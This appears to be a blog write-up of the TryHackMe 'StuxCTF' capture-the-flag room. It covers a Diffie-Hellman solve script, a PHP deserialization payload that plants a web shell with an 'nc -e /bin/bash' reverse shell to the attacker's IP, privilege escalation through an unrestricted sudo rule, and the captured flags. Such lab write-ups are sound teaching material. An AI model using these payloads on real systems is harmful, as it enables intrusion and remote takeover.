The Awesome Blog

StuxCTF

19 Apr 2022

Crypto Web Tryhackme

VOiD XD

My IP : 10.8.253.221 Target IP : 10.10.58.158

PORT 80 [http]

<!-- The secret directory is...
p: 9975298661930085086019708402870402191114171745913160469454315876556947370642799226714405016920875594030192024506376929926694545081888689821796050434591251;
g: 7;
a: 330;
b: 450;
g^c: 6091917800833598741530924081762225477418277010142022622731688158297759621329407070985497917078988781448889947074350694220209769840915705739528359582454617;
		-->

/robots.txt
# robots.txt generated by StuxCTF
# Diffie-Hellman
User-agent: *
Disallow: 
Disallow: /StuxCTF/

Solving it gives : 47315028937264895539131328176684350732577039984023005189203993885687328953804202704977050807800832928198526567069446044422855055


   <!-- hint: /?file= -->

view-source:http://10.10.58.158/47315028937264895539131328176684350732577039984023005189203993885687328953804202704977050807800832928198526567069446044422855055/index.php?file=index.php

unhex data | rev | base64 -d file > index.php

Solved diffie-Hellman using this script :

# Diffie-Hellman solve script

p=9975298661930085086019708402870402191114171745913160469454315876556947370642799226714405016920875594030192024506376929926694545081888689821796050434591251
g=7
a=330
b=450

gc = 6091917800833598741530924081762225477418277010142022622731688158297759621329407070985497917078988781448889947074350694220209769840915705739528359582454617


gca = (gc**a) % p
gcab = (gca**b) % p
 
print(str(gcab)[:128])                                                                

https://www.tutorialspoint.com/execute_php_online.php

<?php 
class file{
	public $file= 'myshell.php';
	public $data = '<?php shell_exec("nc -e /bin/bash 10.8.253.221 4444")?>';
}
echo (serialize(new file));
?>

Gives the exploit

O:4:"file":2:{s:4:"file";s:9:"shell.php";s:4:"data";s:69:"<?php echo "Hey !"; shell_exec("nc -e /bin/bash 10.8.253.221 4444")?>";} 

Shell [www-data]

www-data@ubuntu:/home/grecia$ cat user.txt 
0b6044b7807dd100b9e30f1bd09db53f

www-data@ubuntu:/tmp$ sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: ALL

root@ubuntu:~# cat root.txt 
0028454003b42601548df551b738976c